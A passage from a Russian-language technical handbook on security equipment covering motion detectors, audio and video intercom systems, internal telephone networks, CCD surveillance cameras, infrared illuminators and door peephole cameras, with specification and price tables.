Рис. 3. 34. Схема лучей детекции модели SDI-76EH

Популярным стало использование детектора движения PIRAMID ЕН со встроенной видеокамерой в составе систем видеонаблюдения. Детектор включает видеокамеру и сигнал тревоги при регистрации движущегося объекта в зоне охраны. Детекторы Р I РАМ ID EH со встроенной видеокамерой имеют обозначение EHV (V - Video).

Рис. 3.33. Детектор движения наружного применения PIRAMID ЕН

Изображение: 

Рис. 3.34. Схема лучей детекции модели SDI-76EH

Изображение: 

Таблица 3.1. Пассивные ИК детекторы фирмы Arrowhead

Изображение: 

4. Глава 4. АУДИО- И ВИДЕОДОМОФОННЫЕ УСТРОЙСТВА И СИСТЕМЫ.

Глава 4. АУДИО- И ВИДЕОДОМОФОННЫЕ УСТРОЙСТВА И СИСТЕМЫ.

4. 1. Аудиодомофонные устройства и системы связи.

4. 1. Аудиодомофонные устройства и системы связи

В последнее время для ограничения доступа посторонних лиц в квартиры, дачи, подъезды многоэтажных домов, офисов, банков, магазинов, предприятий и медицинских учреждений применяют аудиодомофонные устройства. Эти устройства имеют современный дизайн, высокое качество воспроизведения звука и обладают широкими функциональными возможностями. Как правило, такие устройства строятся по модульному принципу, что позволяет гибко изменять конфигурацию системы и подключать дополнительных пользователей. Современные аудиодомофонные устройства, или, как их еще называют, переговорные устройства, состоят из наружной и внутренней частей.

Наружная часть устройства устанавливается перед входной дверью и представляет собой панель из алюминия, стали или пластика с кнопками вызова, микрофоном, громкоговорителем и лампочкой подсветки. В некоторых переговорных устройствах для контроля набираемого кода имеется встроенный цифровой индикатор. В комплект поставки всех аудиодомофонных устройств входит дверной электрозамок или дверная электрозащелка.

Внутренняя часть переговорного устройства содержит одну или несколько телефонных трубок с кнопкой дистанционного открывания дверного электрозамка и источник питания для организации аудиодомофонной связи и управления замком.

Рассматриваемые в данном разделе аудиодомофонные устройства имеют следующие особенности:

> возможность регулировки громкости звука как наружной, так и внутренней части домофона;

> тип вызывного сигнала — тоновый или «трель»;

> проводное соединение переговорных частей;

> возможность увеличения числа пользователей;

> дистанционное открывание двери путем нажатия специальной кнопки;

> возможность подключения к внешней телефонной линии.

Все аудиопереговорные устройства зарубежного производства полностью адаптированы к отечественным телефонным линиям. Некоторые из них имеют встроенный считыватель (клавиатурный или с кодовыми ключами), что позволяет осуществить построение двухуровневой системы ограничения доступа.

Современные аудиодомофонные устройства могут выполнять функции охранной системы с формированием звукового сигнала тревоги и его протоколирования на регистрирующем устройстве. При использовании дополнительного адаптера внешней телефонной линии имеется возможность организовать оперативную связь между сотрудниками учреждения и внешними абонентами. Модульное исполнение отдельных блоков большинства аудиодомофонных устройств позволяет изменять конфигурацию системы и наращивать число внутренних пользователей до 2000 и более. При этом обеспечивается полная совместимость обычного телефонного аппарата с цифровыми сигналами аудиодомофонных систем.

4-11.jpg

Рис. 4. 1. Возможная конфигурация современной аудиодомофоннои системы

Рассматриваемые аудиодомофонные устройства могут включать в себя различные функциональные модули (рис. 4. 1): наружную переговорную панель с кнопочными клавишами и системой отображения набранного кода; переговорную трубку для осуществления связи с сотрудниками учреждения и посетителями с индикацией и кнопками управления. Кнопки управления могут выполнять следующие функции:

> открытие/закрытие входной двери;

> отключение звукового сопровождения;

> включение резервного источника питания и другие сервисные функции.

В аудиодомофонной системе можно использовать многофункциональный телефонный аппарат, предназначенный для первичного разговора с посетителем, для подключения требуемого внутреннего пользователя и управления функциями аудиодомофонного устройства. Телефонный интерфейс системы выполняет функции внутренней телефонной станции и обеспечивает коммутацию внутренних телефонов с одной или несколькими внешними линиями.

4. 1. 1. Системы внутренней телефонной связи.

4. 1. 1. Системы внутренней телефонной связи

Системы внутренней телефонной связи могут устанавливаться в зданиях любой архитектуры и назначения (жилых, производственных помещениях) для организации эффективной и недорогой телефонной связи как внутри помещения, так и для связи с наружной панелью у входной двери. Основой такой системы являются электронные телефонные аппараты различных модификаций, обладающие следующими свойствами:

> для сигнала вызова и ведения разговоров используется динамическая головка телефонной трубки;

> для управления электрозамком входной двери используется специальная кнопка на телефонном аппарате — ключ открывания двери;

> для системы внутренней телефонной связи используется общий источник

питания и генератор вызывных и тональных сигналов. Телефоны внутренней связи выпускаются в различных модификациях (рис. 4. 2). Телефонные трубки с одной кнопкой (ключом открывания входной двери) предназначены

для ведения телефонного разговора и управления электрозамком входной двери.

Телефоны с двумя кнопками (ключом открывания двери и сервисной клавишей) имеют то же назначение, что и рассмотренные ранее. Сервисная клавиша может использоваться для включения света или открывания второго замка. Телефонные трубки с двумя кнопками и двумя светодиодными индикаторами обеспечивают:

> световую индикацию незапертых дверей или ворот;

4-1-11.jpg

Рис. 4. 2. Телефонные переговорные трубки с одной кнопкой

> отключение звукового сигнала вызова;

> соединение с внешней городской автоматической телефонной станцией (ГТС);

> временное отключение электрозамка на входной двери, например, в меди цинских учреждениях в рабочие часы.

Телефоны с одной кнопкой (ключом открывания двери) и дополнительной клавишной панелью (рис. 4. 3), как правило, используются для:

> световой индикации незапертых дверей или ворот;

> индикации включения освещения площадки у входной двери;

> временного отключения электрозамка на входной двери;

> включения/выключения звукового сигнала вызова;

> индикации включения резервного питания;

> выполнения вспомогательных функций при помощи сервисной клавиши.

Для организации оперативной внутренней связи между пользователями можно использовать различные сетевые схемы включения телефонных аппаратов. Один из возможных вариантов сети внутренней связи с использованием продукции фирмы Commax приведен на рис. 4. 4.

Применение телефонных интерфейсов (рис. 4. 5), например типа РАВХ 1/5 или РАВХ 2/8, позволяет существенно расширить функциональные возможно-

4-1-12.jpg

Рис. 4. 3. Телефонная переговорная трубка с клавишной панелью

сти внутренней связи. Так, телефонный интерфейс РАВХ 2/8 обеспечивает надежную связь не только между 8 пользователями внутренней связи, но и позволяет коммутировать их на две внешние линии.

Цифровая технология, используемая в телефонных интерфейсах, позволяет создавать гибкую систему управления внутренней телефонной связью с широкими функциональными возможностями. В общем случае, телефонный интерфейс выполняет функции, присущие любой мини-АТС:

> позволяет подключать обычный телефонный аппарат внутренней связи к цифровым системам домофонной связи;

4-1-13.jpg

Рис. 4. 4. Вариант сети внутренней связи

4-1-14.jpg

Рис. 4. 5 Телефонный интерфейс РАВХ 2/8

> поддерживает передачу по проводам не только звуковых, но и видеосигналов;

> поддерживает связь внутренней телефонной сети с внешней линией городской АТС;

> осуществляет автоматическое соединение каждого внутреннего абонента с другими путем набора номера на телефонном аппарате;

> поддерживает передачу управляющих сигналов на электрозамок входной двери или ворот, а также по желанию пользователя на вспомогательные устройства, например на выключатель ламп освещения прихожей или лестничной площадки;

> позволяет наращивать систему путем простого добавления дополнительных компонентов.

К интерфейсу можно подключить дополнительные внутренние телефоны. Он поддерживает подключение до 4 аудио- или видеодомофонов различной конфигурации и способен объединять цифровые и аналоговые домофоны в единую внутреннюю телефонную сеть. В таких системах, как правило, выход в линию городской АТС осуществляется путем набора номера внешнего абонента на комбинированном телефонном аппарате (рис. 4. 6).

Комбинированный телефонный аппарат, кроме клавиш для организации внутренней и внешней телефонной связи, имеет дополнительные, которые существенно расширяют его функциональные возможности:

> включение освещения в прихожей или на лестничной площадке;

> подключение к многофункциональному телефонному аппарату;

> включение встроенной в аппарат громкоговорящей связи;

> управление электрозамком входной двери;

> автоматический сброс набранного номера;

> включение автодозвона набранного номера и др.

Вызов пользователя внутренней телефонной связи с городской АТС осуществляется, как правило, через многофункциональный телефонный аппарат (рис. 4. 7).

4-1-15.jpg

Оператор многофункционального телефонного аппарата обеспечивает не только коммутацию внешних и внутренних абонентов, но и управляет организацией всей внутренней телефонной связи. Многофункциональный телефонный аппарат поддерживает выполнение следующих функций:

> уведомляет внутреннего пользователя о входящем внешнем вызове;

> подключает внешнюю городскую линию АТС к любому внутреннему аппарату;

> осуществляет контроль и передачу посылки вызова на любой телефонный аппарат внутренней связи;

> поддерживает режим ожидания (освобождения) внешней городской линии;

> осуществляет одновременный или выборочный вызов внутренних пользователей (режим «директор-секретарь»);

> управляет электрозамком входной

двери и освещением в прихожей или на лестничной площадке;

> программирует коды системы ограничения доступа, если она используется;

> осуществляет диагностику причин отказов системы и отключает неисправные телефонные аппараты внутренней связи.

4-1-16.jpg

Многофункциональный телефонный аппарат выполняет ряд дополнительных сервисных функций:

> изменение номера внутреннего пользователя;

> передачу соединения другому внутреннему пользователю;

> выход только на многофункциональный телефонный аппарат;

> консультацию и удержание линии;

> ограничение времени исходящего междугородного телефонного разговора;

> тарификацию международного телефонного разговора;

> выход на определенную городскую линию АТС.

Рис. 4.2. Телефонные переговорные трубки с одной кнопкой

Изображение: 

Рис. 4.3. Телефонная переговорная трубка с клавишной панелью

Изображение: 

Рис. 4.4. Вариант сети внутренней связи

Изображение: 

Рис. 4.5 Телефонный интерфейс РАВХ 2/8

Изображение: 

Рис. 4.6 Комбинированный телефонный аппарат

Изображение: 

Рис. 4.7 Многофункциональный телефонный аппарат

Изображение: 

4. 1. 2. Проводные аудиодомофонные устройства.

4. 1. 2. Проводные аудиодомофонные устройства

В настоящее время на российский рынок поставляется большое количество разнообразных аудиодомофонных устройств, в основном, из Италии, Испании, Южной Кореи. Достаточно широко представлены и домофоны отечественного производства. Все эти устройства отличаются широкими функциональными возможностями, оригинальным дизайном, надежностью и удобством монтажа. Они строятся, как правило, по модульному принципу, что позволяет подобрать требуемую конфигурацию системы.

Так, например, фирма Commax (Южная Корея) занимает одно из ведущих мест в данной области и предлагает широкий ассортимент домофонных устройств, обеспечивающих контроль входа и автономную телефонную связь в помещениях различного назначения. Устройства этой фирмы пригодны как для частных квартир, так и для больших учреждений и полностью адаптированы к отечественным условиям, а модульное исполнение обеспечивает любую степень расширения. Эти изделия имеют:

4-1-21.jpg

Рис.4.8 Наружные панели домофонов фирмы Commax

4-1-22.jpg

Рис. 4. 9. Квартирные телефонные аппараты

> оригинальные наружные панели домофонов (некоторые из них приведены на рис. 4. 8);

> телефонные аппараты и электронные компоненты систем ограничения доступа для 1 —4 входов (рис. 4. 9);

> микро-АТС с необходимым набором сервисных функций (рис. 4. 10);

> специальные переговорные устройства для банков, касс и офисов;

> врезные или накладные замки с дистанционным управлением. Особенности:

> качество оборудования соответствует стандарту ЕЭС и национальному стандарту Российской Федерации;

> применение цифрового кода длиной 1—6 знаков обеспечивает полную анонимность пользователя;

> с помощью набора специальных кодов системы могут управлять несколькими исполнительными механизмами, например замками входных дверей, ворот, включать аварийную сигнализацию, освещение и т. д.;

> устройства имеют защиту от продолжительного звонка, например при

заклинивании кнопки.

При использовании дополнительных никель-кадмиевых аккумуляторов и зарядного устройства, поставляемых по специальному заказу, устройства могут работать автономно.

Перечислить все изделия фирмы Commax не представляется возможным из-за чрезвычайно широкого их ассортимента. Аналогичные примеры можно привести

4-1-23.jpg

Рис. 4. 10. Микро-АТС с набором сервисных функции

и по другим фирмам, занимающимся системами ограничения доступа в жилые и служебные помещения. Характеристики некоторых из них приведены в табл. 4. 1.

Кроме того, фирма Commax поставляет на российский рынок комплектующие изделия к аудиодомофонам модульного исполнения, что позволяет выбирать необходимую конфигурацию и наращивать количество кнопок вызова. Так, к базовой модели DP-MSS/DR-nKM она предлагает семь моделей различных дополнительных панелей (на 4, 8, 12, 14, 16 кнопок) и устройство ТР-6АС/12АС для обеспечения внутренней связи между абонентами в офисах и учреждениях.

Рассмотренные выше домофоны предназначены, в основном, для многоквартирных домов, больших офисов и организаций.

В последнее время все большее внимание уделяется вопросам охраны небольших офисов, отдельных квартир, дач и т. п. Зарубежные фирмы, имеющие большой опыт в данной области, предлагают широкий ассортимент аудиодомофонных устройств индивидуального использования. Данные устройства (рис. 4. 11, 4. 12) обладают прекрасным дизайном, выполнены на современной электронной базе, просты в эксплуатации и надежны в работе.

Таблица 4. 1. Аудиопереговорные устройства

Наименование переговорного устройства

Фирма-изготовитель (страна)

Кол-во тлф. трубок

Основные параметры

Примерная цена, USD

Digidue модель 1037

Urmet Domus (Италия)

5-112

Цифровая двухпроводная система

470-1887

Kombi модель 825

Urmet Domus (Италия)

1-34

Kombi, набор различных модулей

75-610

Easivice модель 926

Urmet Domus (Италия)

2-97

Программирование 12-ти кнопочного телефонного аппарата

162-5009

Kombi модели 7771 — 7774

Urmet Domus (Италия)

1-40

Число кнопок на наружной панели по количеству пользователей

103-687

Citoset модели 1130— 1131

Urmet Domus (Италия)

1-2

Системы индивидуального пользования частных квартир

Данных нет

Puntovirgola модель 1PV-2PVD

Farfisa (Италия)

1-2

Панель из анодированного алюминия с кнопками вызова

73-98

Famly Kit модели 1к — 6к

Farfisa (Италия)

1-6

Панель из анодированного алюминия с кнопками вызова

58-195

Minikit модели М911-912

Videx (Италия)

1-2

Стальная панель с кнопками вызова

55-69

Entrikit модели Е 911 - 912

Videx (Италия)

1-2

Стальная панель с кнопками вызова

63-77

Digi phone Kit модель DK918

Videx (Италия)

1

Длина кодового слова 3—6 цифр

180

Keyphone Kit модели P947-947S

Videx (Италия)

1

3—9 кодовых ключей

182

City Kit( 1-6) LINE

Fermax (Испания)

1-6

Панель из анодированного алюминия с кнопками вызова

147-294

Kit Multiway

Fermax (Испания)

2-4

Панель из анодированного алюминия с кнопками вызова

220-285

Memophone Kit модели 1L1 — 2L2

Fermax (Испания)

1-2

Длина кодового слова 1 - 6 цифр

367-415



4-1-24.jpg

Рис. 4. 11. Аудиодомофон индивидуального пользования, с регулировкой чувствительности

4-1-25.jpg

Рис. 4. 12. Аудиодомофон индивидуального пользования для квартир, дач и офисов

Рис. 4.10. Микро-АТС с набором сервисных функции

Изображение: 

Рис. 4.11. Аудиодомофон индивидуального пользования, с регулировкой чувствительности

Изображение: 

Рис. 4.12. Аудиодомофон индивидуального пользования для квартир, дач и офисов

Изображение: 

Рис. 4.8. Наружные панели домофонов фирмы Commax

Изображение: 

Рис. 4.9. Квартирные телефонные аппараты

Изображение: 

4. 1. 3. Беспроводные домофонные системы связи.

4. 1. 3. Беспроводные домофонные системы связи

В беспроводных домофонных системах передача звуковых сообщений происходит по промышленной сети питания 220 В, 50 Гц. Сообщения передаются на высокой частоте (ВЧ), что обеспечивает наилучшую фильтрацию слабого полезного сигнала на фоне шумов промышленной сети. Следовательно, каждая станция (блок переговорного устройства) включает в свой состав несколько разнесенных по частоте генераторов ВЧ колебаний (по числу пользователей), модуляторы звукового сигнала и приемники ВЧ сигналов по числу каналов. К беспроводным домофонным системам можно подключить ограниченное количество абонентов. В состав таких систем входит, как правило, 2—4 станции.

К основным преимуществам беспроводных домофонов можно отнести простоту подключения и возможность быстрого изменения структуры системы, а так же возможность установки переговорного устройства у входной двери офиса или квартиры без прокладки дополнительного кабеля.

В настоящее время ряд ведущих фирм, вышеупомянутая фирма Commax, Urmet Domus (Италия) и др., предлагают беспроводные системы связи с высоким качеством воспроизведения передаваемых сообщений. В качестве примера рассмотрим беспроводные системы связи фирмы Commax (рис. 4. 13), которые имеют следующие характеристики:

> возможность подключения от 2 до 4 станций;

> мелодичный сигнал вызова;

> вызов любой из станций и обеспечение полной конфиденциальности разговора;

> низкая стоимость (от 38 USD за комплект для 2 абонентов).

В качестве примера назначение органов управления на передней панели беспроводной станции WI-4C приведено на рис. 4. 14.

4-1-31.jpg

Рис. 4. 13. Беспроводные системы внутренней связи.

4-1-32.jpg

Рис. 4. 14 Назначение органов управления на передней панели беспроводной станции WI-4C

Для установления связи достаточно нажать кнопку выбора абонента на панели управления станции, при этом загорится индикатор выбранного канала. Далее следует нажать кнопку вызова абонента и приступить к разговору, так как микрофон и громкоговоритель находятся внутри корпуса переговорного устройства. На рис. 4. 15 показаны возможные варианты установления связи для системы WI-3SN, а типовая схема подключения 4-х станций к промышленной сети 220 В, 50 Гц приведена на рис. 4. 16.

4-1-33.jpg

Рис. 4. 15. Возможные варианты установления связи для системы WI-3SN

4-1-34.jpg

Рис. 4. 16. Типовая схема подключения станций

Рис. 4.13. Беспроводные системы внутренней связи

Изображение: 

Рис. 4.14 Назначение органов управления на передней панели беспроводной станции WI-4C

Изображение: 

Рис. 4.15. Возможные варианты установления связи для системы WI-3SN

Изображение: 

Рис. 4.16. Типовая схема подключения станций

Изображение: 

Рис. 4.1. Возможная конфигурация современной аудиодомофоннои системы

Изображение: 

4. 2. Видеодомофонные устройства.

4. 2. Видеодомофонные устройства

Системы и устройства видеоконтроля получили развитие в связи с созданием миниатюрных видеокамер и видеомагнитофонов. История применения фотокамер насчитывает более 100 лет, но на практике применение видеотехники сдерживалось неприемлемыми ее весогабаритными характеристиками. В настоящее время габариты видеокамер могут быть меньше самых миниатюрных фотокамер. Применение приборов видеотехники в системах наблюдения дает несомненные преимущества перед приборами фото- и кинотехники. Прежде всего, это возможность осуществления оперативной записи информации, передачи ее на достаточно большие расстояния и анализа в реальном масштабе времени.

В последнее время солидные фирмы и учреждения для ограничения доступа посторонних лиц все чаще используют видеопереговорные устройства (видеодомофоны). Данные устройства имеют современный дизайн, высокое качество воспроизведения видео- и звуковых сигналов. Также как и аудиодомофоны, видеопереговорные системы строятся по модульному принципу (рис. 4. 17). Это позволяет гибко изменять конфигурацию системы по желанию пользователя. Данные устройства включают в себя видеоканал наблюдения и аудиодомофонное устройство. Поэтому видеодомофонные устройства обладают всеми функциональными возможностями, присущими аудиопереговорным устройствам, особенности применения которых были описаны в разделе 4. 1.

Видеоканал наблюдения видеодомофонного устройства включает в себя миниатюрную видеокамеру, вмонтированную в переговорную панель, и телефонный интерфейс, обеспечивающий передачу изображении на видеоконтрольное устройство (рис. 4. 18).

В качестве примера видеоконтрольного устройства фирмы Urmet Domus на рис. 4. 19 приведены видеомодули модели 1732.

Некоторые видеодомофонные устройства, помимо оперативной телефонной связи и управления электрозамком входной двери, по видеоканалу наблюдения обеспечивают:

> постоянный или периодический осмотр контролируемой зоны (лестничной площадки, входа в дом);

> возможность разговора и визуального наблюдения за посетителем;

4-21.jpg

Рис. 4. 17. Видеодомофоны фирмы Commax

> возможность ведения автоматической видеозаписи до 8-ми последних посетителей с регистрацией времени (модель DN-583R);

> возможность включения ИК подсветки для идентификации посетителей в условиях плохой освещенности;

> возможность просмотра телевизионных программ по монитору (телевизору) при отсутствии вызова по видеопереговорному устройству. Монитор (телевизор) принимает телевизионные передачи в системах NTSC, PAL, SECAM.

Современные видеодомофонные устройства имеют оригинальный внешний вид и различное конструктивное исполнение. Например, в комплект поставки видеодомофонов моделей DN-283 и WY-350 входит черно-белый телевизор с диагональю 13 см, на экране которого отображается изображение посетителя в течение 30 с после звонка с переговорной панели, если не поднята телефонная трубка аппарата. Видеокамера в переговорной панели обеспечивает угол обзора 74° по горизонтали, 55° по вертикали и формирует четкое изображение даже при освещенности объекта 1 лк.

4-22.jpg

Рис. 4. 18. Возможная конфигурация современных видеодомофонных устройств

4-23.jpg

Рис. 4. 19. Видеомодули модели 1732

Основные технические характеристики некоторых зарубежных и отечественных видеодомофонов с ИК подсветкой приведены в табл. 4. 2.

Таблица 4. 2. Основные технические характеристики видеодомофонов

Наименование изделия

KVM-602 KVC-F100 S200

KVM-604 KVC-F100 S200

KVM-500F KVC-F100 S200

DN-283

DN-583R

DPV-2ME

DPV4ME

ТВД-21

Фирма-изготовитель

Kocom

Kocom

Kocom

Dyne

Dyne

Commax

Commax

Тахион

Размер монитора по диагонали, см

10

10

10

13

10

10

10

любой монитор

Угол обзора видеокамеры: - по горизонтали, град;

- по вертикали, град

74

74

50

74

74

72

72

140

55

55

38

55

55

55

55

140

Минимальная освещенность объекта, лк

1

1

2

1

1

0, 5

0, 5

0, 1

Проводная связь (количество жил кабеля)

2

2

4

4

4

2

4

ВЧ-кабель

Диапазон рабочих температур,С

от-10

до+ 50

от-10 до+ 50

от-10 до+ 50

от-10 до+ 50

от-10 до+ 50

от-10 до+ 50

от-10 до+ 50

от-40 до+ 50

Примерная стоимость, USD

353

359

359

355

480

350

328

290


Рис. 4.17. Видеодомофоны фирмы Commax

Изображение: 

Рис. 4.18. Возможная конфигурация современных видеодомофонных устройств

Изображение: 

Рис. 4.19. Видеомодули модели 1732

Изображение: 

5. Глава 5. ТЕЛЕВИЗИОННЫЕ СИСТЕМЫ НАБЛЮДЕНИЯ.

ГЛАВА 5 ТЕЛЕВИЗИОННЫЕ СИСТЕМЫ НАБЛЮДЕНИЯ

 

Нет необходимости напоминать об огромной важности использования видеотехники для обеспечения безопасности различных объектов. В настоящее время на российском рынке предлагается огромный выбор разнообразных видеоустройств для самых различных применений. Зачастую потребителю сложно разобраться, какими должны быть конфигурация охранной видеосистемы наблюдения, ее состав и характеристики используемого в ней оборудования. Поэтому будет не лишним уделить немного внимания и времени для ознакомления с принципами работы и построения видеосистем, а также усвоить терминологию, используемую для описания их характеристик.

Основным компонентом систем телевизионного наблюдения является видеокамера, предназначенная для преобразования оптического изображения в электрический телевизионный сигнал, пригодный для передачи и воспроизведения. Одним из основных элементов видеокамеры является датчик изображения, т. е. устройство преобразования спроецированного объективом оптического изображения наблюдаемого объекта в электрический сигнал (рис. 5. 1). Как правило, в качестве такого датчика используются передающие телевизионные трубки и твердотельные преобразователи свет-сигнал.

51.jpg

Рис. 5. 1. Преобразование оптического изображения в электрический сигнал

Передающая телевизионная трубка — это электронно-лучевой прибор. В зависимости от конструкции эти приборы называют видиконами, глетиконами (плюмбиконами), ньювиконами и т. п. Основными элементами передающей телевизионной трубки являются мишень и электронный прожектор. Последний предназначен для формирования узкого электронного пучка, падающего перпендикулярно мишени. Мишень, состоящая из сигнальной пластины и полупроводникового фотопроводящего слоя, нанесена на внутреннюю поверхность передней стенки баллона передающей трубки. Особенность фотослоя мишени заключается в том, что она обладает внутренним фотоэффектом — под действием подающего на мишень света изменяется электропроводность фотослоя. Благодаря этому, на мишени создается и хранится потенциальный рельеф, соответствующий входному оптическому сигналу.

Электрический сигнал снимается с сигнальной пластины, представляющей собой довольно тонкий слой двуокиси олова или индия.

Все известные передающие телевизионные трубки объединяет наличие фотопроводящей мишени, малые габариты и масса, небольшое число регулировок, достаточно высокая чувствительность и разрешающая способность. Разрешающая способность оценивается по наименьшему расстоянию между двумя точками, при котором их изображения еще не сливаются. Это расстояние выражается в линейных или угловых мерах. Величина, обратная этому расстоянию, служит количественной мерой разрешающей способности оптических приборов.

В последнее время все большее применение находят твердотельные преобразователи свет-сигнал. Это фоточувствительные приборы с зарядовой связью (ПЗС). Практически все современные телевизионные малогабаритные камеры наблюдения строятся на основе матричных ПЗС. Поверхность матрицы ПЗС состоит из множества светочувствительных ячеек — пикселов (обычно от 270 000 до 440 000). Чем большее количество пикселов размещается на матрице ПЗС, тем выше качество и четкость получаемого изображения. Как правило, разрешающая способность по горизонтали таких камер составляет 330—600 твл (телевизионных линий). Этот

52.jpg

Рис. 5. 2. Зависимость угла обзора от формата матрицы ПЗС

53.jpg

Рис. 5. 3. Размеры матриц ПЗС различных форматов

параметр приводится в паспортных данных на камеру. Разрешение по вертикали всех камер одинаково, ибо ограничено стандартом на количество строк разложения — 625 строк.

Размер матрицы ПЗС определяется ее форматом. Формат — это диагональный размер видикона, формирующего изображение, эквивалентное изображению, формируемому матрицей ПЗС. Формат измеряется в дюймах и принимает значения 1/2", 1/3", 1/4" и т. п. Формат матрицы определяет угол обзора телевизионной камеры (рис. 5. 2)

С одинаковыми объективами телевизионная камера на основе матрицы формата 1/2" имеет больший угол обзора, чем камера с матрицей формата 1/3".

Чем меньше формат матрицы ПЗС, тем миниатюрнее камера. Соотношение размера матрицы ПЗС и ее размеров в миллиметрах показано на рис. 5. 3.

Для увеличения угла обзора матрицы малого формата должны иметь объектив с малым фокусным расстоянием. При этом качество телевизионного изображения будет определяться светосилой объектива, т. е. количеством света, которое будет проходить через него и попадать на преобразователь свет-сигнал. Чем выше светосила объектива, тем меньше нужно времени для освещения матрицы ПЗС до получения изображения необходимого качества. Светосила объектива зависит от двух величин: диаметра входного зрачка D и фокусного расстояния f. Отношение диаметра входного зрачка объектива к фокусному расстоянию называется относительным отверстием F и записывается, например, в виде F: 1, 6 или F: 1/б. Светосила объектива тем выше, чем больше диаметр его входного зрачка и меньше фокусное расстояние.

Следующий важный параметр ТВ камеры — ее чувствительность. Производители по-разному трактуют это понятие. Одни под чувствительностью понимают минимальную освещенность объекта, при которой еще можно различить черно-белые переходы на изображении, другие — минимальную освещенность на матрице ПЗС. С технической точки зрения более правильно было бы указывать освещенность на матрице ПЗС, т. к. в этом случае не нужно оговаривать характеристики используемого объектива. Но пользователю при установке камеры удобнее работать с освещенностью объекта, которую он заранее знает. Поэтому в паспортных данных ТВ камер обычно указывают минимальную освещенность объекта, например 0, 1 лк (люкс).

Спектральная чувствительность черно-белых ТВ камер перекрывает и инфракрасную область спектра. Это позволяет использовать их в условиях плохой освещенности, применяя специальные ИК осветители.

Электронный затвор является неотъемлемой частью ТВ камеры на основе матрицы ПЗС. Точнее, когда говорят о той или иной скорости электронного затвора, подразумевают соответствующий режим работы матрицы ПЗС камеры. Скорость электронного затвора является одной из основных характеристик видеокамеры и определяет качество воспроизведения быстро перемещающихся объектов. В современных камерах используют затворы со скоростью срабатывания от 1/50 до 1/10000 с.

В настоящее время быстрыми темпами развиваются методы цифровой обработки видеосигнала. В таких системах аналоговый сигнал, снимаемый с матрицы ПЗС, проходит через аналого-цифровой преобразователь, размещенный внутри ТВ камеры. Затем сигнал разделяется на яркостную и цветовую компоненты, обрабатывается микропроцессором и поступает на цифровой монитор. Это позволяет существенно улучшить разрешение и качество изображения.

Телевизионные системы наблюдения можно рассматривать как надежный охранный комплекс вашего офиса, учреждения, квартиры.

Системы скрытного охранного телевизионного наблюдения имеют четыре основных направления применения (рис. 5. 4):

> переговорная панель домофона со скрытой телевизионной камерой наблюдения;

> телевизионный дверной глазок;

> скрытая миниатюрная телевизионная камера наблюдения;

> вынесенная телевизионная камера наблюдения.

Скрытые телевизионные камеры и телевизионный дверной глазок (снаружи выглядит, как обычный дверной глазок) монтируются в дверь или переговорную

54.jpg

Рис. 5. 4. Применение телекамер в составе охранной системы

панель домофона. Эти системы телевизионного наблюдения с целью повышения качества наблюдаемых объектов имеют небольшое фокусное расстояние и угол обзора объектива до 160°. Для идентификации объектов в темное время суток совместно с телекамерами используются устройства инфракрасной подсветки (длина волны 870 нм). В табл. 5. 1 приведены устройства инфракрасной подсветки, получившие широкое применение в системах телевизионного наблюдения.

Таблица 5. 1. Устройства инфракрасной подсветки

Модель

Фирма (страна)

Сектор подсветки, град.

Дальность подсветки, м

Питание, В/А

Примерная цена, USD

ФОТ-1

Текра (Россия)

120

4

12 /0, 4

30

IR-20F

Computar (Япония)

27

12

12 /1, 7

240

IR-50F

Computar (Япония)

27

30

12/4, 2

310

IR-75F

Computar (Япония)

25

40

12/6, 25

390

IR-150F

Computar (Япония)

25

80

12/10

662


5. 1. Телевизионные дверные глазки.

5. 1. Телевизионные дверные глазки

Дверной видеоглазок — это специальная миниатюрная телевизионная камера черно-белого изображения, предназначенная для дистанционного наблюдения за обстановкой перед входной дверью квартиры, офиса, дачи по экрану телевизора или видеомонитора. По внешнему виду с наружной стороны двери он ничем не отличается от обычного дверного глазка. Устанавливается видеоглазок на входные двери толщиной от 30 мм до 70 мм. Схема наблюдения может быть организована двумя способами:

> передача сигналов изображения (рис. 5. 5) происходит по радиоканалу в дециметровом (ДМВ) диапазоне волн на частотах 38—42 ТВ каналов, для преобразования видеосигнала в радиочастотный ТВ сигнал применяется передатчик телевизионных сигналов;

> передача сигналов изображения по кабелю на НЧ вход телевизора или

монитора (рис. 5. 6).

Телевизионные дверные глазки имеют различную конструкцию и предназначены для установки на дверях различного типа. Размещение видеоглазка на металлической двери производится аналогично установке обычного дверного глазка (рис. 5. 7, а).

5-11.jpg

Рис. 5. 5. Передача изображения по радиоканалу

5-12.jpg

Рис. 5. 6. Передача изображения по проводам

Пример монтажа видеоглазка на деревянной или сложной двери показан на рис. 5. 7, б.

Кроме видеоглазка можно установить скрытую видеокамеру. На металлической или деревянной двери скрытая телевизионная видеокамера устанавливается так, как показано на рис. 5. 7, в.

В некоторых дверных видеоглазках, например "Циклоп-2" (WAT-660), используется электронный затвор, позволяющий получать высококачественное изображение быстро перемещающихся объектов, а видеоглазок VG-3 предназначен для непосредственного подключения к передатчику телевизионных сигналов, в отличие от других, соединение которых с монитором или телевизором осуществляется посредством телевизионного кабеля.

Технические характеристики видеоглазков приведены в табл. 5. 2.

Таблица 5.2. Технические характеристики дверных видеоглазков

Наименование изделия

«Циклоп-1» (СА-Н32С)

«Циклоп-2» (WAT-660)

VG-1

VG-2

VG-3

VG-4

«Циклоп-3» (VC-150)

«Цикло11-4» (СА-Н34С)

VS-160DG

Разрешающая способность ТВ камеры, твл

380

380

380

380

380

380

380

380

430

Минимальная освещенность, лк

1

0,8

0,4

0,4

0,4

0,4

1

1

0,1

Формат матрицы ПЗС, дюйм

1/3

-

1/3

1/3

1/3

1/3

1/3

1/3

1/3

Угол обзора оъектива, град

150

85

160

125

160

190

100

100

160

Напряжение питания, В

9-12

9-9,5

9-11

9 11

9-11

9-11

12

12 -•

12

Толщина двери, мм

до 64

до 40

до 70

до 40

до 70

до 45

до 70

до 70

до 40

Диаметр отверстия в двери для установки объектива, мм

22

16

20

22

30

22

20

40

23

Примерная цена, USD

175

200

160

155

210

185

175

169

180



5-13.jpg

Рис. 5.7. Монтаж видеоглазка (а, 6) и скрытой телевизионной камеры (в)

Рис. 5.5. Передача изображения по радиоканалу

Изображение: 

Рис. 5.6. Передача изображения по проводам

Изображение: 

Рис. 5.7. Монтаж видеоглазка (а, 6) и скрытой телевизионной камеры (в)

Изображение: 

5. 2. Скрытые видеокамеры наблюдения.

5. 2. Скрытые видеокамеры наблюдения

